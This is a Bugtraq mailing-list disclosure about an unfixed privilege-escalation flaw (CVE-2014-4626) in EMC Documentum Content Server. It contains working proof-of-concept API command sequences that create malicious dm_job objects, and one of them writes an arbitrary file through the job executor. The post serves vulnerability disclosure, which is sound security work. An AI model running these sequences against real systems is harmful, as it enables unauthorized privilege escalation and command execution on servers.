Bugtraq mailing list archives
Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects
From: <andrew () panfilov tel>
Date: Wed, 1 Jul 2015 16:39:10 +1000
Product: EMC Documentum Content Server Vendor: EMC Version: ANY CVE: N/A Risk: High Status: public/not fixed On April 2014 I discovered vulnerability in EMC Documentum Content Server which allow authenticated user to elevate privileges, hijack Content Server filesystem or execute arbitrary commands by creating malicious dm_jobobjects (for detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).
On October 2014 vendor announced ESA-2014-105 which was claiming that vulnerability has been remediated. On November 2014 fix was contested (there was significant delay after ESA-2014-105 because vendor constantly fails to provide status of reported vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt, description provided to CERT/CC (another CNA was chosen because vendor fails to communicate) was: =================================8<================================ The problem is that non-privileged user is able to create dm_job objects and execute corresponding docbase methods (some examples of "malicious" methods are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here does mean some sequence of commands which result to existence of dm_job object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does not schedule jobs unless they are owned by superuser, so, the command sequence in that case was: "create dm_job and update dm_job", EMC thinks that they have fixed vulnerability, but they just fixed the sequence given in PoC, another sequence is "create dm_sysobject, update dm_sysobject & change dm_sysobject" - see VRF#HUGC34JH, it's already known attack. Also, I could provide third PoC related to this report, but I do not think that would be useful for EMC. =================================>8================================ Current status of CVE-2014-4626 is obscure, last public status could be found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340): =================================8<================================ The new exploit is being tracked under PSRC-2494. This is targeted for Q1 2015 (March patch). =================================>8================================ Though latest builds of EMC Documentum Content Server successfully pass PoCs described previously: =================================8<================================ API> create,c,dm_job ... 08024be980006902 API> set,c,l,owner_name SET> dmadmin ... OK API> set,c,l,world_permit SET> 7 ... OK API> save,c,l ... [DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error: "Must have system admin privileges or superuser privileges to change the owner_name to 'dmadmin'." API> create,c,dm_sysobject ... 08024be980006904 API> set,c,l,owner_name SET> dmadmin ... OK API> set,c,l,world_permit SET> 7 ... OK API> save,c,l ... OK API> ?,c,change dm_sysobject object to dm_job where r_object_id='08024be980006904' [DM_QUERY_F_CHANGE_SAVE]fatal: "CHANGE: An unexpected save error has occurred for object 08024be980006904." [DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error: "The current user (test) needs to have superuser or sysadmin privilege to create or save or destroy objects of type (dm_job)." =================================>8================================ the vulnerability remains unfixed, below is a another PoC (job engine in Documentum consists of two parts: scheduler and executor, previous attacks were designed to exploit vulnerability in scheduler, this one demonstrates how to exploit vulnerability in job executor): =================================8<================================ API> create,c,dm_job ... 08024be98000690e API> set,c,l,object_name SET> malicious job ... OK API> set,c,l,inactivate_after_failure SET> 0 ... OK API> set,c,l,max_iterations SET> 0 ... OK API> set,c,l,method_name SET> dm_file_writer ... OK API> set,c,l,pass_standard_arguments SET> 0 ... OK API> set,c,l,run_interval SET> 1 ... OK API> set,c,l,run_mode SET> 1 ... OK API> set,c,l,run_now SET> 1 ... OK API> set,c,l,is_inactive SET> 0 ... OK API> set,c,l,world_permit SET> 7 ... OK API> append,c,l,method_arguments SET> /tmp/test.txt ... OK API> append,c,l,method_arguments SET> agentexec_has_vulnerability ... OK API> append,c,l,method_arguments SET> CREATE ... OK API> save,c,l ... OK API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method, ARGUMENTS,S,' -docbase_name DCTM_DEV.DCTM_DEV -docbase_owner dmadmin -job_id 08024be98000690e -log_directory /u01/documentum/cs/dba/log -docbase_id 150505 -trace_level 10 ' ... q0 API> next,c,q0 ... OK API> dump,c,q0 ... USER ATTRIBUTES result : 0 process_id : 91436 launch_failed : F method_return_val : 0 os_system_error : No Error timed_out : F time_out_length : 60 app_server_host_name : app_server_port : 0 app_server_uri : error_message : SYSTEM ATTRIBUTES APPLICATION ATTRIBUTES INTERNAL ATTRIBUTES API> Bye ~]$ cat /tmp/test.txt agentexec_has_vulnerability =================================>8================================ __ Regards,Andrey B. Panfilov
Attachment:
VRF#HUFU6FNP.txt
Description:
Attachment:
VRF#HUFV0UZN.txt
Description:
Attachment:
VRF#HUGC34JH.txt
Description:
Current thread:
- Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects andrew (Jul 01)